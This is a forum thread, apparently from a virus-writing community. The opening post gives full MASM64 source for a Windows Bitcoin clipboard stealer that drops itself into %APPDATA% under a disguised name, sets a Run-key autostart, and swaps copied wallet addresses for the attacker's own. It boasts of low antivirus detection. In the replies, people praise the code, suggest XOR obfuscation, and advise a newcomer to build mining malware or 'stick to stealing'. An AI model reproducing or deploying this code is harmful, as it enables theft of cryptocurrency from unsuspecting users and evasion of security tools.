Topic: Bitcoin stealer (MASM64)

Replaces bitcoin address when copying to clipboard.
Drop to %APPDATA% as systemtools.exe.
Entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run for autostart.
Detection rate: 2/56
https://virustotal.com/pl/file/8c1e0ea0 … 480071040/

extrn ExitProcess : proc
extrn MessageBoxA : proc
extrn CreateThread : proc
extrn WaitForSingleObject : proc
extrn Sleep : proc
extrn OpenClipboard : proc
extrn GetClipboardData : proc
extrn GlobalLock : proc
extrn CloseClipboard : proc
extrn GlobalUnlock : proc
extrn lstrlen : proc
extrn RtlCopyMemory : proc
extrn GlobalAlloc : proc
extrn EmptyClipboard : proc
extrn SetClipboardData : proc
extrn IsClipboardFormatAvailable : proc
extrn RegOpenKeyExA : proc
extrn GetModuleFileNameA : proc
extrn RegSetValueExA : proc
extrn RegCloseKey : proc
extrn SHGetFolderPathA : proc
extrn CopyFileA : proc
extrn CreateMutexA : proc
extrn GetLastError : proc
extrn lstrcat : proc

.const
minLength equ 27
maxLength equ 34
CF_TEXT equ 1
CF_OEMTEXT equ 7
CF_UNICODETEXT equ 13
GMEM_MOVEABLE equ 2
ERROR_ALREADY_EXISTS equ 183
CSIDL_APPDATA equ 26
HKEY_CURRENT_USER equ 80000001h
KEY_SET_VALUE equ 2
KEY_CREATE_SUB_KEY equ 4
KEY_WOW64_64KEY equ 0100h
KEY_WRITE equ 00020006h
REG_SZ equ 00000001h

.data
szAuthorWebsite db "http://vxzone.pl/", 0
szYourBitcoinWalletAddress db "YourBitcoinWalletAddressHere", 0
hThread dq 0
dqThreadId dq 0
hClipboard dq 0
pClipboard dq 0
hGlobal dq 0
pGlobal dq 0
dqLength dq 0
szMutex db "8F7FFFZ7-78B7-45HH-A9DF-84D02F7EF08X",0
szRegKeyName db "Software\Microsoft\Windows\CurrentVersion\Run",0
szRegValueName db "System Tools",0
szDroppedFileName db "\systemtools.exe",0
szDropPath db 256 dup(0)
szApplicationPath db 256 dup(0)

.code
hReg equ 28h

    MyThreadProc proc
        mainLoop:
            sub rsp, 28h
            mov rcx, 250
            call Sleep
            add rsp, 28h
            
            sub rsp, 28h
            mov rcx, CF_TEXT
            call IsClipboardFormatAvailable
            add rsp, 28h
            cmp rax, 0
            je mainLoop
            
            sub rsp, 28h
            xor rcx, rcx
            call OpenClipboard
            add rsp, 28h
            cmp rax, 0
            je errorLabel
    
            sub rsp, 28h
            mov rcx, CF_TEXT
            call GetClipboardData
            add rsp, 28h
            cmp rax, 0
            je errorLabel
            mov hClipboard, rax
    
            sub rsp, 28h
            mov rcx, hClipboard
            call GlobalLock
            add rsp, 28h
            mov pClipboard, rax
    
            sub rsp, 28h
            mov rcx, hClipboard
            call GlobalUnlock
            add rsp, 28h
    
            sub rsp, 28h
            call CloseClipboard
            add rsp, 28h
    
            sub rsp, 28h
            mov rcx, pClipboard
            call lstrlen
            add rsp, 28h
    
            cmp rax, minLength
            jb mainLoop
            cmp rax, maxLength
            ja mainLoop
            
            xor rcx, rcx
            mov rsi, pClipboard
            checkLoop:
            mov al, byte ptr [rsi + rcx]
            inc cl
            cmp al, 0
            je replaceWalletAddress
            cmp al, '0'
            jb mainLoop
            cmp al, '9'
            jbe checkLoop
            cmp al, 'A'
            jb mainLoop
            cmp al, 'Z'
            jbe checkLoop
            cmp al, 'a'
            jb mainLoop
            cmp al, 'z'
            jbe checkLoop
            jmp mainLoop
            
            replaceWalletAddress:
            sub rsp, 28h
            lea rcx, szYourBitcoinWalletAddress
            call lstrlen
            add rsp, 28h
            inc rax
            mov dqLength, rax
            
            sub rsp, 28h
            mov rdx, dqLength
            mov rcx, GMEM_MOVEABLE
            call GlobalAlloc
            add rsp, 28h
            mov hGlobal, rax
            
            sub rsp, 28h
            mov rcx, hGlobal
            call GlobalLock
            add rsp, 28h
            mov pGlobal, rax
            
            sub rsp, 28h
            mov r8, dqLength
            lea rdx, szYourBitcoinWalletAddress
            mov rcx, pGlobal
            call RtlCopyMemory
            add rsp, 28h
            
            sub rsp, 28h
            mov rcx, hGlobal
            call GlobalUnlock
            add rsp, 28h
            
            sub rsp, 28h
            xor rcx, rcx
            call OpenClipboard
            add rsp, 28h
            cmp rax, 0
            je errorLabel
            
            sub rsp, 28h
            call EmptyClipboard
            add rsp, 28h
    
            sub rsp, 28h
            mov rdx, hGlobal
            mov rcx, CF_TEXT
            call SetClipboardData
            add rsp, 28h
            
            sub rsp, 28h
            call CloseClipboard
            add rsp, 28h
        jmp mainLoop
        
        errorLabel:
            xor rcx, rcx
            call ExitProcess
    MyThreadProc endp

    Main proc
    sub rsp, 28h
        lea r8, szMutex
        xor rdx, rdx
        xor rcx, rcx
        call CreateMutexA
        add rsp, 28h
        
        sub rsp, 28h
        call GetLastError
        add rsp, 28h
        cmp     rax, ERROR_ALREADY_EXISTS
        je     more_than_one_copy
    
        sub rsp, 38h
        lea rax, szDropPath
        mov [rsp+20h], rax
        mov r9, 0
        mov r8, 0
        mov rdx, CSIDL_APPDATA
        xor rcx, rcx
        call SHGetFolderPathA
        add rsp, 38h
    
        sub rsp, 28h
        lea rdx, szDroppedFileName
        lea rcx, szDropPath
        call lstrcat
        add rsp, 28h
    
        sub rsp, 38h
        lea rax, [rsp+hReg]
        mov [rsp+20h], rax
        mov r9, KEY_SET_VALUE+KEY_CREATE_SUB_KEY
        mov r8, 0
        lea rdx, szRegKeyName
        mov rcx, HKEY_CURRENT_USER
        call RegOpenKeyExA
        add rsp, 38h
        
        sub rsp, 38h
        lea rbx, szDropPath
        mov [rsp+20h], rbx
        mov r9, REG_SZ
        mov r8, 0
        lea rdx, szRegValueName
        mov rcx, [rsp+hReg]
        call RegSetValueExA
        add rsp, 38h
        
        sub rsp, 38h
        mov rcx, [rsp+hReg]
        call RegCloseKey
        add rsp, 38h
        
        sub rsp, 28h
        mov r8, sizeof szApplicationPath
        lea rdx, szApplicationPath
        mov rcx, 0
        call GetModuleFileNameA
        add rsp, 28h
        
        sub rsp, 28h
        mov r8, 0
        lea rdx, szDropPath
        lea rcx, szApplicationPath
        call CopyFileA
        add rsp, 28h
    
        sub rsp, 48h
        mov rax, dqThreadId
        mov [rsp+28h], rax
        xor rax, rax
        mov [rsp+20h], rax
        xor r9, r9
        lea r8, MyThreadProc
        xor rdx, rdx
        xor rcx, rcx
        call CreateThread
        mov hThread, rax
        add rsp, 48h
        
        sub rsp, 28h
        mov rdx, 0FFFFFFFFh
        mov rcx, hThread
        call WaitForSingleObject
        add rsp, 28h
        
        more_than_one_copy:
        sub rsp, 28h
        xor rcx, rcx
        call ExitProcess
        add rsp, 28h
    Main endp
end

Thumbs up +4 Thumbs down

Re: Bitcoin stealer (MASM64)

YAY! Actual code for once!

I like to examine and theorize about everything, from Amazon's <quote> impenetrable </quote> ultravisor to autorun viruses (virii?) being technology's version of an STD (Slot Transmitted Disease).
I dabble in Python 2.x and non-stereotypical BATCH (x>50 lines). I also fuck up VMs from time to time.

┬──┬ ︵ /(.□. \)

Thumbs up Thumbs down

Re: Bitcoin stealer (MASM64)

Yeniaul wrote:

YAY! Actual code for once!

Thank you someone for posting something that doesn't disgust me with it's lameness  lol

I am growing tired of the lame posts on this site  sad

----
JPanic - Johnny Panic
Ex Immortal Riot/Genesis, NOP, Team MiSSiON
@JPanicVX on Twitter

Thumbs up Thumbs down

Re: Bitcoin stealer (MASM64)

Detection rate: 2/56

Before xoring big_smile

Thanks for your code!

"For the Snark was a Boojum, you see."

Thumbs up Thumbs down

Re: Bitcoin stealer (MASM64)

actually something cool smile

"There is no spoon." - http://guitmz.com/

Thumbs up Thumbs down

Re: Bitcoin stealer (MASM64)

Can someone explain how this works ? Because i want to create a Bitcoin miner virus in Python....

The problem is that i don't understand "how to mine bitcoins".....i searched on the web but it didn't really help  sad

Thumbs up Thumbs down

7 (edited by thesnark 2016-11-29 15:38:12)

Re: Bitcoin stealer (MASM64)

Can someone explain how this works ?

This code watches the clipboard of a windows machine and replaces a Bitcoin address copied into the clipboard with an address of your choice. The idea being that the BTC would be sent to that address instead. It's clever.


i want to create a Bitcoin miner virus in Python

Mining is a totally different thing that takes a pretty noticeable amount of computing power unless you've infected a large number of machines.

Mining in python:
https://github.com/m0mchil/poclbm

OpenCL is supported by Windows, Mac and Linux alike, so using poclbm would get your job done. Make sure to use a peer to peer mining pool.

Suggestion: Either write something that infects a mining rig or stick to stealing. Mining on ordinary PCs will get you almost no money these days.

"For the Snark was a Boojum, you see."

Thumbs up Thumbs down

Re: Bitcoin stealer (MASM64)

Well, thanks for the reply but i think i won't even try to do it....

I was thinking about creating a malware that infects IoT devices and mines bitcoin...but after i've done some research seems it won't work since the virus will be “just wasting electricity.”

Thumbs up Thumbs down